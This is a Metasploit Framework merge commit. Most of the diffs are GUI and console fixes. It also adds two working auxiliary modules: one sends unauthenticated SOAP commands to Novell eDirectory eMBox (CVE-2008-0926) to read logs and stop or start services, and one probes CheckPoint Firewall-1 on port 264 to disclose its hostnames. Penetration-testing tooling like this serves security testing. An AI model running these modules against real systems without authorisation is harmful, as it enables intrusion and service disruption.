Merge remote branch 'upstream/master'

unstable
chao-mu 2011-12-16 19:44:13 -05:00
commit df0abd0273
12 changed files with 286 additions and 30 deletions

Binary file not shown.

View File

@ -265,6 +265,7 @@ public class DbConnectDialog extends OptionsDialog {
token = s.next();
}
} catch (FileNotFoundException fnfox){
fnfox.printStackTrace();
}
showDefaults();
}

2
external/source/gui/msfguijava/src/msfgui/MainFrame.java vendored Normal file → Executable file
View File

@ -265,6 +265,7 @@ public class MainFrame extends FrameView {
}
publish((Object)jobStrings);
} catch (MsfException msfEx) {
if(!MsfguiApp.shuttingDown || !msfEx.getMessage().contains("Connection refused"))
msfEx.printStackTrace();
publish("Error getting session list "+msfEx);
if(!msfEx.getMessage().contains("timed out")) // on timeout, just retry
@ -1655,6 +1656,7 @@ nameloop: for (int i = 0; i < names.length; i++) {
});
jobsList.addMouseListener( new PopupMouseListener() {
public void mouseReleased(MouseEvent e){
super.mouseReleased(e);
int indx = jobsList.locationToIndex(e.getPoint());
if (indx == -1)
return;

View File

@ -3,8 +3,6 @@ package msfgui;
import java.awt.Component;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.awt.event.FocusEvent;
import java.awt.event.FocusListener;
import java.awt.event.MouseEvent;
import java.io.File;
import java.io.IOException;
@ -199,7 +197,6 @@ public class MeterpFileBrowser extends MsfFrame {
/** Retrieves list of files. */
private void getFiles() {
//Set up locking so the console doesn't eat our output
if(!lock.tryLock())
lock.lock();
while(model.getRowCount() > 0)
@ -243,10 +240,8 @@ public class MeterpFileBrowser extends MsfFrame {
for(int i = 0; i < mainTable.getColumnCount(); i++)
if(mainTable.getColumnName(i).equals("Name"))
nameColumn = i;
if(nameColumn != -1){
if(nameColumn != -1)
mainTable.moveColumn(nameColumn, 0);
stop();
}
} catch (Exception ex) {
ex.printStackTrace();
if(ex.getMessage().toLowerCase().contains("unknown session"))

View File

@ -103,7 +103,6 @@ public class OpenConnectionDialog extends javax.swing.JDialog {
String host = info.get("host").toString();
int port = Integer.parseInt(info.get("port").toString());
boolean ssl = Boolean.parseBoolean(info.get("ssl").toString());
String type = info.get("type").toString();
RpcConnection rpc = RpcConnection.getConn(username, password.toCharArray(), host, port, ssl);
if(javax.swing.JOptionPane.showConfirmDialog(null, "Connect to last remembered rpcd?") == javax.swing.JOptionPane.YES_OPTION)
return rpc;

View File

@ -57,16 +57,6 @@ public class ProcessList extends MsfFrame {
this.rpcConn = rpcConn;
this.session = session;
this.lock = (ReentrantLock)sessionPopupMap.get(session.get("id")+"lock");
((DraggableTabbedPane)tabbedPane).setTabFocusListener(0, new FocusListener() {
public void focusGained(FocusEvent e) {
if(!lock.tryLock())
lock.lock();
}
public void focusLost(FocusEvent e) {
while(lock.getHoldCount() > 0)
lock.unlock();
}
});
//See if we need to move our tab
Map props = MsfguiApp.getPropertiesNode();
if(!props.get("tabWindowPreference").equals("window")){
@ -74,13 +64,12 @@ public class ProcessList extends MsfFrame {
(Component)sessionPopupMap.get(session.get("id")+"console")));
DraggableTabbedPane.show(mainPanel);
}
if(!lock.tryLock())
lock.lock();
listProcs();
}
/** Lists the processes that are running */
protected void listProcs() throws HeadlessException {
lock.lock();
if (runCommand("ps"))
return;
readTimer = new Timer(300, new ActionListener() {
@ -113,6 +102,7 @@ public class ProcessList extends MsfFrame {
readTimer.stop();
MsfguiApp.showMessage(null, ex.getMessage());
}
lock.unlock();
}
});
readTimer.start();

View File

@ -185,19 +185,61 @@ class Core
cmd_resource_help
return false
end
args.each do |res|
if not File.file? res
good_res = nil
if (File.file? res and File.readable? res)
good_res = res
elsif
# let's check to see if it's in the scripts/resource dir (like when tab completed)
[
::Msf::Config.script_directory + File::SEPARATOR + "resource",
::Msf::Config.user_script_directory + File::SEPARATOR + "resource"
].each do |dir|
res_path = dir + File::SEPARATOR + res
if (File.file?(res_path) and File.readable?(res_path))
good_res = res_path
break
end
end
end
if good_res
driver.load_resource(good_res)
else
print_error("#{res} is not a valid resource file")
next
end
driver.load_resource(res)
end
end
#
# Tab completion for the resource command
#
def cmd_resource_tabs(str, words)
return [] if words.length > 1
tab_complete_filenames(str, words)
tabs = []
#return tabs if words.length > 1
if ( str and str =~ /^#{Regexp.escape(File::SEPARATOR)}/ )
# then you are probably specifying a full path so let's just use normal file completion
return tab_complete_filenames(str,words)
elsif (not words[1] or not words[1].match(/^\//))
# then let's start tab completion in the scripts/resource directories
begin
[
::Msf::Config.script_directory + File::SEPARATOR + "resource",
::Msf::Config.user_script_directory + File::SEPARATOR + "resource"
].each do |dir|
next if not ::File.exist? dir
tabs += ::Dir.new(dir).find_all { |e|
path = dir + File::SEPARATOR + e
::File.file?(path) and File.readable?(path)
}
end
rescue Exception
end
else
tabs += tab_complete_filenames(str,words)
end
return tabs
end
def cmd_makerc_help
@ -902,7 +944,7 @@ class Core
if (path !~ /#{File::SEPARATOR}/)
plugin_file_name = path
# If the plugin isn't in the user direcotry (~/.msf3/plugins/), use the base
# If the plugin isn't in the user directory (~/.msf3/plugins/), use the base
path = Msf::Config.user_plugin_directory + File::SEPARATOR + plugin_file_name
if not File.exists?( path + ".rb" )
# If the following "path" doesn't exist it will be caught when we attempt to load
@ -2132,7 +2174,7 @@ class Core
# Returns the revision of the framework and console library
#
def cmd_version(*args)
ver = "$Revision$"
ver = "$Revision: 14065 $"
print_line("Framework: #{Msf::Framework::Version}.#{Msf::Framework::Revision.match(/ (.+?) \$/)[1]}")
print_line("Console : #{Msf::Framework::Version}.#{ver.match(/ (.+?) \$/)[1]}")

View File

@ -0,0 +1,156 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell eDirectory eMBox Unauthenticated File Access',
'Description' => %q{
This module will access Novell eDirectory's eMBox service and can run the
following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
STOP_SERVICE, START_SERVICE, SET_LOGFILE.
},
'References' =>
[
[ 'CVE', '2008-0926' ],
[ 'BID', '28441' ],
[ 'OSVDB', '43690' ]
],
'Author' =>
[
'Nicob',
'MC', #Initial Metasploit module
'sinn3r'
],
'License' => MSF_LICENSE,
'Actions' =>
[
[
'GET_DN',
{
'Description' => 'Get DN',
'CMD' => 'novell.embox.connmgr.serverinfo',
'PATTERN' => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,
'USE_PARAM' => false
}
],
[
'READ_LOGS',
{
'Description' => 'Read all the log files',
'CMD' => 'logger.readlog',
'PATTERN' => /<LogFileData>(.*)<\/LogFileData>/,
'USE_PARAM' => false
}
],
[
'LIST_SERVICES',
{
'Description' => 'List services',
'CMD' => 'novell.embox.service.getServiceList',
'PATTERN' => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,
'USE_PARAM' => false
}
],
[
'STOP_SERVICE',
{
'Description' => 'Stop a service',
'CMD' => 'novell.embox.service.stopService',
'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
'PARAM' => '<Parameters><params xmlns:DSService="service.dtd">'+
'<DSService:moduleName>__PARAM__</DSService:moduleName>'+
'</params></Parameters>',
'USE_PARAM' => true
}
],
[
'START_SERVICE',
{
'Description' => 'Start a service',
'CMD' => 'novell.embox.service.startService',
'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
'PARAM' => '<Parameters>' +
'<params xmlns:DSService="service.dtd">' +
'<DSService:moduleName>__PARAM__</DSService:moduleName>'+
'</params></Parameters>',
'USE_PARAM' => true
}
],
[
'SET_LOGFILE',
{
'Description' => 'Read Log File',
'CMD' => 'logger.setloginfo',
'PATTERN' => /<Logger:Message dt="Binary">(.*)<\/Logger:Message>/,
'PARAM' => '<Parameters><params><logFile>__PARAM__</logFile>'+
'<logOptionAppend/></params></Parameters>',
'USE_PARAM' => true
}
]
],
'DefaultAction' => 'LIST_SERVICES'
))
register_options(
[
Opt::RPORT(8028),
OptString.new("PARAM", [false, 'Specify a parameter for the action'])
], self.class)
end
def run
if action.opts['USE_PARAM']
if datastore['PARAM'].nil? or datastore['PARAM'].empty?
print_error("You must supply a parameter for action: #{action.name}")
return
else
param = action.opts['PARAM'].gsub(/__PARAM__/, datastore['PARAM'])
end
else
param = '<Parameters><params/></Parameters>'
end
template = %Q|<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<dispatch>
<Action>#{action.opts['CMD']}</Action>
<Object/>#{param}</dispatch>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>|
template = template.gsub(/^\t\t/, '')
template = template.gsub(/\n/, '')
connect
print_status("Sending command: #{action.name}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => '/SOAP',
'data' => template + "\n\n",
'headers' =>
{
'Content-Type' => 'text/xml',
'SOAPAction' => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"",
}
}, 25)
raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0]
print_line("\n" + Rex::Text.decode_base64(raw_data))
disconnect
end
end

View File

@ -0,0 +1,69 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CheckPoint Firewall-1 Topology Service Hostname Disclosure',
'Description' => %q{
This module sends a query to the TCP port 264 on CheckPoint
firewalls to obtain the firewall name and management station
(such as SmartCenter) name.
},
'Author' => [ 'patrick' ],
'Version' => '$Revision$',
'References' =>
[
# patrickw - None? Stumbled across, probably an old bug/feature but unsure.
[ 'URL', 'http://www.osisecurity.com.au/advisories/' ],
]
))
register_options(
[
Opt::RPORT(264),
], self.class)
end
def autofilter
false
end
def run
print_status("Attempting to contact Checkpoint FW1 Topology service...")
connect
sock.put("\x51\x00\x00\x00")
sock.put("\x00\x00\x00\x21")
res = sock.get(4)
if (res == "Y\x00\x00\x00")
print_good("Appears to be a CheckPoint Firewall...")
sock.put("\x00\x00\x00\x0bsecuremote\x00")
res = sock.get_once
if (res =~ /CN\=(.+),O\=(.+)\./i)
print_good("Firewall Host: #{$1}")
print_good("SmartCenter Host: #{$2}")
end
else
print_error("Unexpected response:\r\n#{res}")
end
disconnect
end
end

View File

@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '77556'],
[ 'URL', 'http://www.exploit-db.com/exploits/18213/' ],
[ 'URL', 'http://traqproject.org/' ],
],

View File

@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '77387'],
[ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],
[ 'URL', 'http://www.exploit-db.com/exploits/18187/' ],
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf' ]

View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post
if not ::File.exists?(datastore['RESOURCE'])
raise "Resource File does not exists!"
else
::File.open(datastore['RESOURCE'], "br").each_line do |cmd|
::File.open(datastore['RESOURCE'], "rb").each_line do |cmd|
next if cmd.strip.length < 1
next if cmd[0,1] == "#"
begin